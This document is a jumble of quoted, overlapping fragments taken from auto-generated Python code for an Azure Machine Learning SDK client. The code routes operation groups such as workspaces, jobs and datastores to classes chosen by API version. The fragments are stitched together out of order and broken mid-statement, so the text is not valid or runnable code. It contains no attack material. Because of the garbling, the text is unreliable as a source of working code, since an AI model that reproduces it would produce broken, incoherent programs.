:class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateLinkResourcesOperations>` \"\"\" api_version", "WorkspacesOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "'2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobEndpointOperations as OperationClass else: raise ValueError(\"API version {} does", "= KnownProfiles.default, **kwargs # type: Any ) -> None: self._config = AzureMachineLearningWorkspacesConfiguration(credential, subscription_id,", "from azure.mgmt.core import AsyncARMPipelineClient from azure.profiles import KnownProfiles, ProfileDefinition from azure.profiles.multiapiclient import MultiApiClientMixin", "import BatchDeploymentsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import BatchDeploymentsOperations as", "'quotas'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def registry_management_non_workspace(self): \"\"\"Instance depends on the", "self._get_api_version('compute') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ComputeOperations as OperationClass elif api_version", "the API version: * 2022-02-01-preview: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataContainersOperations>` * 2022-05-01: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataContainersOperations>` \"\"\" api_version = self._get_api_version('data_containers')", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'models'\".format(api_version))", "from ..v2022_01_01_preview.aio.operations import WorkspaceFeaturesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "api_version = self._get_api_version('registry_management_non_workspace') if api_version == 'v1.0': from ..registry_discovery.aio.operations import RegistryManagementNonWorkspaceOperations as OperationClass", "from ..v2022_02_01_preview.aio.operations import CodeContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "version {} does not have operation group 'batch_job_deployment'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "..model_dataplane.aio.operations import MigrationOperations as OperationClass else: raise ValueError(\"API version {} does not have", "'2021-10-01': from ..v2021_10_01.aio.operations import OnlineDeploymentsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations", "Deserializer(self._models_dict(api_version))) @property def get_operation_status(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`GetOperationStatusOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.GetOperationStatusOperations>`", "api_version == 'v1.0': from ..runhistory.aio.operations import MetricOperations as OperationClass else: raise ValueError(\"API version", "the API version: * 2021-10-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelContainersOperations>` * 2021-10-01-dataplanepreview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelContainersOperations>` * 2022-02-01-preview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelContainersOperations>` *", "version {} does not have operation group 'registry_management_non_workspace'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "does not have operation group 'code_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "API version: * 2021-10-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatastoresOperations>` * 2022-02-01-preview: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DatastoresOperations>` * 2022-05-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DatastoresOperations>` \"\"\" api_version", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentContainersOperations>` * 2021-10-01-dataplanepreview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentContainersOperations>` *", "{k: v for k, v in cls.models(api_version).__dict__.items() if isinstance(v, type)} @classmethod def models(cls,", "operation group 'virtual_machine_sizes'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspace_connections(self): \"\"\"Instance depends", "'run_artifacts': 'v1.0', 'runs': 'v1.0', 'spans': 'v1.0', 'temporary_data_references': '2021-10-01-dataplanepreview', }}, _PROFILE_TAG + \" latest\"", "needed for the client to connect to Azure. :type credential: ~azure.core.credentials_async.AsyncTokenCredential :param subscription_id:", "version: * 1.0.0: :class:`ModelsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ModelsOperations>` \"\"\" api_version = self._get_api_version('models') if api_version == '1.0.0': from", "..v2022_05_01.aio.operations import JobsOperations as OperationClass else: raise ValueError(\"API version {} does not have", "api_version = self._get_api_version('events') if api_version == 'v1.0': from ..runhistory.aio.operations import EventsOperations as OperationClass", "@property def batch_job_endpoint(self): \"\"\"Instance depends on the API version: * 2020-09-01-dataplanepreview: :class:`BatchJobEndpointOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobEndpointOperations>` \"\"\"", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'models'\".format(api_version)) return", "version {} does not have operation group 'batch_endpoints'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "DataVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "does not have operation group 'batch_deployments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "ValueError(\"API version {} does not have operation group 'datasets_v1'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "* 2022-05-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspacesOperations>` \"\"\" api_version = self._get_api_version('workspaces') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "import DeleteOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "def batch_deployments(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchDeploymentsOperations>` * 2022-02-01-preview:", "from ..v2021_10_01_dataplanepreview.aio.operations import ModelVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import", "else: raise ValueError(\"API version {} does not have operation group 'models'\".format(api_version)) return OperationClass(self._client,", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def runs(self): \"\"\"Instance depends on the API version:", "Deserializer(self._models_dict(api_version))) @property def batch_deployments(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchDeploymentsOperations>`", "..v2021_10_01.aio.operations import DatasetContainersOperations as OperationClass else: raise ValueError(\"API version {} does not have", "2021-10-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentVersionsOperations>` * 2022-02-01-preview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentVersionsOperations>` * 2022-05-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentVersionsOperations>` \"\"\" api_version", "operation group 'dataset_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_controller_v2(self): \"\"\"Instance depends", "lost if the code is # regenerated. # -------------------------------------------------------------------------- from typing import Any,", "== '2022-05-01': from ..v2022_05_01.aio.operations import Operations as OperationClass else: raise ValueError(\"API version {}", "'models': '1.0.0', 'registry_management_non_workspace': 'v1.0', 'run': 'v1.0', 'run_artifacts': 'v1.0', 'runs': 'v1.0', 'spans': 'v1.0', 'temporary_data_references':", "Deserializer(self._models_dict(api_version))) @property def online_deployments(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineDeploymentsOperations>`", "does not have operation group 'quotas'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_container(self): \"\"\"Instance depends on the API version: *", "as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import Operations as OperationClass elif", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def operations(self): \"\"\"Instance depends on the API version:", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.UsagesOperations>` * 2022-01-01-preview: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.UsagesOperations>` *", "* v1.0: :class:`RunOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunOperations>` \"\"\" api_version = self._get_api_version('run') if api_version == 'v1.0': from ..runhistory.aio.operations", "def experiments(self): \"\"\"Instance depends on the API version: * v1.0: :class:`ExperimentsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.ExperimentsOperations>` \"\"\" api_version", "self._get_api_version('model_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ModelVersionsOperations as OperationClass elif api_version", "DatasetsV1Operations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "..v2022_05_01.aio.operations import ComputeOperations as OperationClass else: raise ValueError(\"API version {} does not have", "elif api_version == '1.0.0': from ..model_dataplane import models return models elif api_version ==", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import DatasetVersionsOperations as OperationClass else: raise ValueError(\"API", "depends on the API version: * v1.0: :class:`SpansOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.SpansOperations>` \"\"\" api_version = self._get_api_version('spans') if", "DeleteOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "API version: * v1.0: :class:`MetricOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.MetricOperations>` \"\"\" api_version = self._get_api_version('metric') if api_version == 'v1.0':", "import WorkspacesOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "2021-10-01-dataplanepreview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelVersionsOperations>` * 2022-02-01-preview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelVersionsOperations>` * 2022-05-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelVersionsOperations>` \"\"\" api_version = self._get_api_version('model_versions') if", "'runs': 'v1.0', 'spans': 'v1.0', 'temporary_data_references': '2021-10-01-dataplanepreview', }}, _PROFILE_TAG + \" latest\" ) def", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def async_operations(self): \"\"\"Instance depends on the API version: * v1.0:", "version: * 1.5.0: :class:`DatasetControllerV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetControllerV2Operations>` \"\"\" api_version = self._get_api_version('dataset_controller_v2') if api_version == '1.5.0': from", "from ..v2021_10_01.aio.operations import ModelVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import", "Deserializer(self._models_dict(api_version))) @property def models(self): \"\"\"Instance depends on the API version: * 1.0.0: :class:`ModelsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ModelsOperations>`", ":mod:`dataset_dataplane.models<azure.mgmt.machinelearningservices.dataset_dataplane.models>` * 1.0.0: :mod:`model_dataplane.models<azure.mgmt.machinelearningservices.model_dataplane.models>` * v1.0: :mod:`registry_discovery.models<azure.mgmt.machinelearningservices.registry_discovery.models>` * v1.0: :mod:`runhistory.models<azure.mgmt.machinelearningservices.runhistory.models>` * 2020-09-01-dataplanepreview: :mod:`v2020_09_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.models>`", "ComponentContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ComponentContainersOperations as OperationClass", "ValueError(\"API version {} does not have operation group 'virtual_machine_sizes'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "self._get_api_version('run') if api_version == 'v1.0': from ..runhistory.aio.operations import RunOperations as OperationClass else: raise", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DatastoresOperations as OperationClass else: raise ValueError(\"API", ":class:`DatasetContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetContainersOperations>` \"\"\" api_version = self._get_api_version('dataset_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import DatasetContainersOperations", "operation group 'async_operations'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_deployments(self): \"\"\"Instance depends", ":class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentVersionsOperations>` * 2022-02-01-preview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentVersionsOperations>` * 2022-05-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentVersionsOperations>` \"\"\" api_version = self._get_api_version('environment_versions') if api_version", "* 2021-10-01: :class:`Operations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.Operations>` * 2022-01-01-preview: :class:`Operations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.Operations>` * 2022-05-01: :class:`Operations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.Operations>` \"\"\" api_version = self._get_api_version('operations')", "from ..v2021_10_01.aio.operations import BatchEndpointsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import", "{} does not have operation group 'workspace_features'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "import AssetsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "import models return models elif api_version == '1.0.0': from ..model_dataplane import models return", "import OnlineDeploymentsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import OnlineDeploymentsOperations as", ":class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeContainersOperations>` \"\"\" api_version = self._get_api_version('code_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import CodeContainersOperations", "import Deserializer, Serializer from ._configuration import AzureMachineLearningWorkspacesConfiguration if TYPE_CHECKING: # pylint: disable=unused-import,ungrouped-imports from", ":class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentVersionsOperations>` \"\"\" api_version = self._get_api_version('component_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ComponentVersionsOperations", "does not have operation group 'private_endpoint_connections'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "does not have operation group 'workspace_features'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "def workspaces(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspacesOperations>` * 2022-01-01-preview:", "'2021-10-01': from ..v2021_10_01.aio.operations import VirtualMachineSizesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations", "api_version = self._get_api_version('data_versions') if api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DataVersionsOperations as OperationClass", "\"\"\" api_version = self._get_api_version('metric') if api_version == 'v1.0': from ..runhistory.aio.operations import MetricOperations as", "profile is provided, or if missing in profile. :type api_version: str :param base_url:", "models elif api_version == '1.0.0': from ..model_dataplane import models return models elif api_version", ":class:`AssetsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.AssetsOperations>` \"\"\" api_version = self._get_api_version('assets') if api_version == '1.0.0': from ..model_dataplane.aio.operations import AssetsOperations", "= \"https://management.azure.com\", profile: KnownProfiles = KnownProfiles.default, **kwargs # type: Any ) -> None:", "as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ModelContainersOperations as OperationClass elif", "'v1.0': from ..runhistory.aio.operations import ExperimentsOperations as OperationClass else: raise ValueError(\"API version {} does", "group 'usages'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def virtual_machine_sizes(self): \"\"\"Instance depends on", "'workspaces'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) async def close(self): await self._client.close() async def", ":param credential: Credential needed for the client to connect to Azure. :type credential:", "\"\"\"Instance depends on the API version: * 2020-09-01-dataplanepreview: :class:`BatchJobDeploymentOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobDeploymentOperations>` \"\"\" api_version = self._get_api_version('batch_job_deployment')", "@property def quotas(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.QuotasOperations>` *", "self._get_api_version('batch_deployments') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import BatchDeploymentsOperations as OperationClass elif api_version", "operation group and its API version. The api-version parameter sets the default API", "group 'online_deployments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def online_endpoints(self): \"\"\"Instance depends on", "ValueError(\"API version {} does not have operation group 'assets'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "group 'environment_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def environment_versions(self): \"\"\"Instance depends on", "{} does not have operation group 'events'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "1.5.0: :class:`DatasetControllerV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetControllerV2Operations>` \"\"\" api_version = self._get_api_version('dataset_controller_v2') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import", "have operation group 'data_container'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_containers(self): \"\"\"Instance", "== '1.5.0': from ..dataset_dataplane.aio.operations import DataCallOperations as OperationClass else: raise ValueError(\"API version {}", "2022-05-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.UsagesOperations>` \"\"\" api_version = self._get_api_version('usages') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "from ..v2022_01_01_preview.aio.operations import WorkspacesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "not have operation group 'jobs'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def metric(self):", "group 'delete'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def environment_containers(self): \"\"\"Instance depends on", "else: raise ValueError(\"API version {} does not have operation group 'code_containers'\".format(api_version)) return OperationClass(self._client,", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def datastores(self): \"\"\"Instance depends on the API version: *", "azure.profiles import KnownProfiles, ProfileDefinition from azure.profiles.multiapiclient import MultiApiClientMixin from msrest import Deserializer, Serializer", "from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import", "on the API version: * 2021-10-01-dataplanepreview: :class:`TemporaryDataReferencesOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.TemporaryDataReferencesOperations>` \"\"\" api_version = self._get_api_version('temporary_data_references') if api_version", "virtual_machine_sizes(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.VirtualMachineSizesOperations>` * 2022-01-01-preview: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.VirtualMachineSizesOperations>`", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def registry_management_non_workspace(self): \"\"\"Instance depends on the API", "api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DataContainerOperations as OperationClass else: raise ValueError(\"API version", "== '2021-10-01': from ..v2021_10_01.aio.operations import ComputeOperations as OperationClass elif api_version == '2022-01-01-preview': from", "else: raise ValueError(\"API version {} does not have operation group 'private_link_resources'\".format(api_version)) return OperationClass(self._client,", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def code_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "version: * 2021-10-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentVersionsOperations>` * 2022-02-01-preview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentVersionsOperations>` * 2022-05-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentVersionsOperations>`", "code_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeContainersOperations>` * 2021-10-01-dataplanepreview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeContainersOperations>`", "'2021-10-01-dataplanepreview', }}, _PROFILE_TAG + \" latest\" ) def __init__( self, credential: \"AsyncTokenCredential\", subscription_id:", "on the API version: * 1.0.0: :class:`ModelsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ModelsOperations>` \"\"\" api_version = self._get_api_version('models') if api_version", "2022-05-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.QuotasOperations>` \"\"\" api_version = self._get_api_version('quotas') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "api_version == '1.5.0': from ..dataset_dataplane.aio.operations import GetOperationStatusOperations as OperationClass else: raise ValueError(\"API version", "== '1.0.0': from ..model_dataplane.aio.operations import ExtensiveModelOperations as OperationClass else: raise ValueError(\"API version {}", "_SDKClient): \"\"\"These APIs allow end users to operate on Azure Machine Learning Workspace", "'2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import PrivateLinkResourcesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "etc.). By default, it uses the latest API version available on public Azure.", "have operation group 'batch_deployments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_endpoints(self): \"\"\"Instance", "This ready contains multiple API versions, to help you deal with all of", "on the API version: * 1.5.0: :class:`DatasetControllerV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetControllerV2Operations>` \"\"\" api_version = self._get_api_version('dataset_controller_v2') if api_version", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import WorkspaceFeaturesOperations as OperationClass else: raise ValueError(\"API version", "* 2021-10-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentVersionsOperations>` * 2022-02-01-preview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentVersionsOperations>` * 2022-05-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentVersionsOperations>` \"\"\"", "== '2021-10-01': from ..v2021_10_01.aio.operations import JobsOperations as OperationClass elif api_version == '2022-02-01-preview': from", "* 2022-05-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.QuotasOperations>` \"\"\" api_version = self._get_api_version('quotas') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def code_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "from ..v2022_02_01_preview.aio.operations import DataVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "{} does not have operation group 'run_artifacts'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'events'\".format(api_version)) return", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def experiments(self): \"\"\"Instance depends on the API", "..v2021_10_01_dataplanepreview import models return models elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview import models", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def metric(self): \"\"\"Instance depends on the API version: * v1.0:", "TYPE_CHECKING from azure.mgmt.core import AsyncARMPipelineClient from azure.profiles import KnownProfiles, ProfileDefinition from azure.profiles.multiapiclient import", "'v1.0': from ..runhistory.aio.operations import EventsOperations as OperationClass else: raise ValueError(\"API version {} does", "ValueError(\"API version {} does not have operation group 'datastores'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "does not have operation group 'extensive_model'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "will be lost if the code is # regenerated. # -------------------------------------------------------------------------- from typing", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def datasets_v1(self): \"\"\"Instance depends on the API", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'virtual_machine_sizes'\".format(api_version)) return", "the latest API version available on public Azure. For production, you should stick", "self._get_api_version('online_endpoints') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import OnlineEndpointsOperations as OperationClass elif api_version", "== '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import TemporaryDataReferencesOperations as OperationClass else: raise ValueError(\"API version {}", "operations(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`Operations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.Operations>` * 2022-01-01-preview: :class:`Operations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.Operations>`", "depends on the API version: * v1.0: :class:`RunArtifactsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunArtifactsOperations>` \"\"\" api_version = self._get_api_version('run_artifacts') if", "\"\"\" api_version = self._get_api_version('migration') if api_version == '1.0.0': from ..model_dataplane.aio.operations import MigrationOperations as", "the API version: * 1.5.0: :class:`GetOperationStatusOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.GetOperationStatusOperations>` \"\"\" api_version = self._get_api_version('get_operation_status') if api_version ==", "operation group 'data_call'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_container(self): \"\"\"Instance depends", "CodeVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import CodeVersionsOperations as OperationClass", "'2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ComponentContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "(Azure Stack, Azure Government, Azure China, etc.). By default, it uses the latest", "'assets'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def async_operations(self): \"\"\"Instance depends on the", "Deserializer(self._models_dict(api_version))) @property def data_version(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DataVersionOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataVersionOperations>`", "api_version = self._get_api_version('temporary_data_references') if api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import TemporaryDataReferencesOperations as OperationClass", "..v2022_05_01.aio.operations import CodeVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not have", "import ComputeOperations as OperationClass elif 